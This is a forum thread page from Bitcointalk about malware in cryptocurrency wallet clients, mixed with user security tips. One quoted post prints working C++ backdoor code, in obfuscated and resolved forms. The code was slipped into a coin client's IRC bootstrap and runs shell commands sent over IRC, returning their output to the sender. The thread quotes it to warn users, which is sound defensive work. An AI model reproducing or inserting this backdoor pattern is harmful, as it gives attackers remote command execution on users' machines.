Pages:
Author

Topic: Beware of Increasingly Sophisticated Malware Infection Attempts - page 43. (Read 689504 times)

legendary
Activity: 1806
Merit: 1164
Well, BTC hardware wallet protection starts to be very complicated, because trojans, worms also are more developed. Only Linux can help, I think  Wink

Just get a Trezor for your bitcoin. Your private keys will then be safe offline and Trezor works with Windows, Linux and OS X 10.8+

There are clever hacks for a trezor as well, nothing is 100% safe so don't get lulled into a false sense of security. See: http://www.hackinsight.org/news,303.html

Granted, that is a particular version of firmware but as wih any device that stores "money" there will always be people looking for the loopholes. A dedicated attacker only needs a small window of time to make your funds vanish.

Pretty old news. The hack that Jochen Hoenicke found for Trezor was disabled when Trezor started enforcing PINs on firmware 1.3.3. Using a Trezor with PIN and passphrase enabled is about as safe as it gets for storing your bitcoin.

There is malware that can steal bitcoin from password protected local wallets. Coinbitclip is one example and there are more.
newbie
Activity: 43
Merit: 0
Another pretty save and easy to use program is Deep Freeze.
You can freeze your Windows partition and as soon as you reboot, your pc will go to the state you made when you "freeze" it.
This way no viruses,keyloger,trojans,rats and etc can infect you (as soon as you reboot, the bad staff is gone).
Downside is that you will have to put the block-chain of any coins you use on the second partition of your harddrive (because you will not be able to update the wallet on the windows partition).


+10 for Deep Freeze, thanks!! check out spyshelter also good protection against keyloggers, and such.  
hero member
Activity: 1008
Merit: 1012
I have encountered this such problem in the past. I have since stopped using bitcoin core as a wallet and not had a wallet that you need to download to your computer to use it since I find it annoying to have to download the blockchain every time you log into the program. Not to mention it eats up alot of my bandwidth that I seem to be running out of when the end of the month approaches.
member
Activity: 478
Merit: 66
Interesting... This is the reason why I don't dabble too much in AltCoins that seem fishy or have a very low/unknown value.
hero member
Activity: 952
Merit: 500
WARNING !! This client is making outbound connections to known malware and/or phishing sites.


http://www.urlquery.net/report.php?id=1434020970582

The "Recent reports on same IP/ASN/Domain" section shows other suspicious sites/links.
https://www.virustotal.com/en/url/946ac3207509fb493eaf2e02e107b97cc03513cb373bb007a8a61b9b6b0fe61c/analysis/1434120962/

Now lets see what the debug.log has to say...
Code:
2015-06-12 12:41:10 connection timeout
2015-06-12 12:41:11 trying connection 77.249.89.46:9748 lastseen=1802.3hrs
2015-06-12 12:41:16 connection timeout
2015-06-12 12:41:17 trying connection 104.219.250.234:9748 lastseen=7.2hrs
2015-06-12 12:41:22 connection timeout
2015-06-12 12:41:22 trying connection 82.238.124.41:9748 lastseen=33.6hrs
2015-06-12 12:41:27 connection timeout
2015-06-12 12:41:28 trying connection 77.85.35.151:9748 lastseen=170.7hrs
2015-06-12 12:41:33 connection timeout
2015-06-12 12:41:33 trying connection 137.135.57.119:9748 lastseen=27.6hrs
2015-06-12 12:41:38 connection timeout
2015-06-12 12:41:39 trying connection 96.54.4.190:9748 lastseen=21.7hrs
2015-06-12 12:41:44 connection timeout
2015-06-12 12:41:44 trying connection 87.154.210.76:9748 lastseen=378.8hrs
2015-06-12 12:41:49 connection timeout
2015-06-12 12:41:50 trying connection 103.230.107.12:9748 lastseen=2166.3hrs
2015-06-12 12:41:55 connection timeout
2015-06-12 12:41:55 trying connection 104.219.250.234:9748 lastseen=7.2hrs
2015-06-12 12:42:00 connection timeout
2015-06-12 12:42:01 trying connection 62.157.39.12:9748 lastseen=2675.3hrs
2015-06-12 12:42:06 connection timeout
2015-06-12 12:42:06 trying connection 71.100.135.84:9748 lastseen=16.9hrs
2015-06-12 12:42:11 connection timeout
2015-06-12 12:42:12 trying connection 162.255.117.105:9748 lastseen=52.5hrs
2015-06-12 12:42:17 trying connection 104.219.250.234:9748 lastseen=7.2hrs
2015-06-12 12:42:22 connection timeout
2015-06-12 12:42:23 trying connection 71.100.135.84:9748 lastseen=16.9hrs
2015-06-12 12:42:28 connection timeout
2015-06-12 12:42:28 trying connection 5.139.143.81:9748 lastseen=3461.6hrs
2015-06-12 12:42:33 connection timeout
2015-06-12 12:42:34 trying connection 104.219.250.234:9748 lastseen=7.2hrs
2015-06-12 12:42:39 connection timeout
2015-06-12 12:42:39 trying connection 104.219.250.234:9748 lastseen=7.2hrs
2015-06-12 12:42:44 connection timeout
2015-06-12 12:42:45 trying connection 87.154.214.25:9748 lastseen=2063.7hrs
2015-06-12 12:42:50 connection timeout
************************************************************
2015-06-12 12:42:50 trying connection 104.219.250.234:9748 lastseen=7.2hrs**
************************************************************
2015-06-12 12:42:55 connection timeout
2015-06-12 12:42:56 trying connection 80.57.229.215:9748 lastseen=115.2hrs
2015-06-12 12:43:01 connection timeout
2015-06-12 12:43:01 trying connection 77.232.5.253:9748 lastseen=1191.0hrs

Report for the address, 104.xxx.xxx.234, :
http://www.urlquery.net/report.php?id=1434121818636

And one of it's suspicious links/sites :
https://www.virustotal.com/en/url/3b1a7af045bdc8005e8243f65d203df04ba8d43f9e10fd39af1004aad75da0ed/analysis/1434122387/

Then from this screenshot lookS like Geocoin (and then all his clone) have malicious code in it...or I'm wrong?
What can we do to inspect the source of coins looking for malicious code and prevent this kind of things?
legendary
Activity: 1624
Merit: 1001
All cryptos are FIAT digital currency. Do not use.
But an IRC backdoor would only work on online machines, not cold wallets. Are exchanges still not keeping the majority of their bitcoins offline?

Apparently not Cryptsy. They lost 13,000 BTC and 300,000 LTC because of the Lucky7Coin trojan.

That what you see there is a red herring. Wink
https://en.wikipedia.org/wiki/Red_herring

https://bitcointalksearch.org/topic/m.13729914
copper member
Activity: 2856
Merit: 3071
https://bit.ly/387FXHi lightning theory
There was apparently a coin that had a malicious virus in its client software.
It was AvatarCoin and the wallet tried to duplicate the .dat wallet files onto the scammers Server so that he could take all of the coins from them wallets and sell them.

The avatarcoin scam, even included an avatar campaign of 8000AV to every user who joined the campaign and stopped paying around January 8th.
full member
Activity: 224
Merit: 100
This user is currently ignored.
But an IRC backdoor would only work on online machines, not cold wallets. Are exchanges still not keeping the majority of their bitcoins offline?

Apparently not Cryptsy. They lost 13,000 BTC and 300,000 LTC because of the Lucky7Coin trojan.
legendary
Activity: 2940
Merit: 1330
And this is what allegedly brings down Cryptsy...

In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.

[...]

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
}
}
here is the source code with macros resolved:
Code:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
pclose(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
}
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.

But an IRC backdoor would only work on online machines, not cold wallets. Are exchanges still not keeping the majority of their bitcoins offline?
legendary
Activity: 1330
Merit: 1000
Blockchain Developer
And this is what allegedly brings down Cryptsy...
legendary
Activity: 1064
Merit: 1000
Well, BTC hardware wallet protection starts to be very complicated, because trojans, worms also are more developed. Only Linux can help, I think  Wink

Just get a Trezor for your bitcoin. Your private keys will then be safe offline and Trezor works with Windows, Linux and OS X 10.8+

There are clever hacks for a trezor as well, nothing is 100% safe so don't get lulled into a false sense of security. See: http://www.hackinsight.org/news,303.html

Granted, that is a particular version of firmware but as wih any device that stores "money" there will always be people looking for the loopholes. A dedicated attacker only needs a small window of time to make your funds vanish.
legendary
Activity: 1008
Merit: 1000
★YoBit.Net★ 350+ Coins Exchange & Dice
I found this today. Post has since been removed but I managed to screenshot it beforehand and also left negative feedback. A link to the virus total results is included in the feedback.




It wasn't especially sophisticated, nor was it crypted just a basic wallet stealing code that scans PC for private keys. Seems to be targeted at noobs that would get greedy and download without thinking.

off topic slightly but You dont happen to know the name of a program i can use that will scan all my hard disk drives for wallets do you? Would be handy if it also finds dash wallets because ive got at least 1 wallet on my hdd somewhere that ive completely lost.
legendary
Activity: 1806
Merit: 1164
Well, BTC hardware wallet protection starts to be very complicated, because trojans, worms also are more developed. Only Linux can help, I think  Wink

Just get a Trezor for your bitcoin. Your private keys will then be safe offline and Trezor works with Windows, Linux and OS X 10.8+
legendary
Activity: 1064
Merit: 1000
I found this today. Post has since been removed but I managed to screenshot it beforehand and also left negative feedback. A link to the virus total results is included in the feedback.




It wasn't especially sophisticated, nor was it crypted just a basic wallet stealing code that scans PC for private keys. Seems to be targeted at noobs that would get greedy and download without thinking.
newbie
Activity: 2
Merit: 0
I have heard of dead coins.. is this a scam/malware? I would like to know about them before investing in any type of online currency. Thanks!
legendary
Activity: 1894
Merit: 1001
Won't Norton Internet Security detect the malware if present on a certain wallet?

I have been using NIS (legally bought, not patched) for a long time. Hope it can detect them.

Also they are updating binaries every time with "Virus Definition Updates".

Can anyone confirm the facts by testing any malicious wallet on a PC with NIS previously installed?

  malware/virus detectors only foil amateur hackers(period) use sandboxie, and know that some malware can detect being opened in sandboxie... or deep freeze, but the hacker gets your coin anyway ...

 linux is the best bet, go ahead, take the plunge   Cheesy
hero member
Activity: 658
Merit: 500
Well, BTC hardware wallet protection starts to be very complicated, because trojans, worms also are more developed. Only Linux can help, I think  Wink
member
Activity: 70
Merit: 10
Won't Norton Internet Security detect the malware if present on a certain wallet?

I have been using NIS (legally bought, not patched) for a long time. Hope it can detect them.

Also they are updating binaries every time with "Virus Definition Updates".

Can anyone confirm the facts by testing any malicious wallet on a PC with NIS previously installed?
newbie
Activity: 29
Merit: 0
Another pretty save and easy to use program is Deep Freeze.
You can freeze your Windows partition and as soon as you reboot, your pc will go to the state you made when you "freeze" it.
This way no viruses,keyloger,trojans,rats and etc can infect you (as soon as you reboot, the bad staff is gone).
Downside is that you will have to put the block-chain of any coins you use on the second partition of your harddrive (because you will not be able to update the wallet on the windows partition).
copper member
Activity: 2856
Merit: 3071
https://bit.ly/387FXHi lightning theory
I have also noticed, I was unable to download one of the cryptocurrency cores as it was flagged up as being harmful by norton internet security! This is highly likely with all of the cryptocurrency cores as they are open source which means nothing is protecting them from being hacked and placed onto the cryptocurrency's website in order to attack the computers of many users!

  if programs are open source then you can look at the code yourself, to see whether or not it is malicious. try that with windows or any other closed-source executable

I'm not great at reading binary code: as that is what the .exe extension usually means, is there a better way to read programms

(disclaimer: i am no expert here)
  source code is human readable, you don't have to be a programmer to look at it, neither do you have to fully understand all the nuances of an executable to see if it might be malicious.

 check out github
https://github.com/explore

wean yourself from Windows if you haven't already
i like to dual-boot: when i start my pc i can choose win or lin. i always prefer linux but sometimes i'm stuck with 'doz
open source is awesome
it is the life blood of digital liberty imo.  Cheesy

 
 

I do quite like linux, I have a raspberry pi b+ which cannot run a lot of operating systems. Is there a way to change the BiOS so that if I have a certain external hard drive connected then it will run from that. I know it is F2 when started up but I don't want to change the factory settings of my laptop
Pages:
Jump to: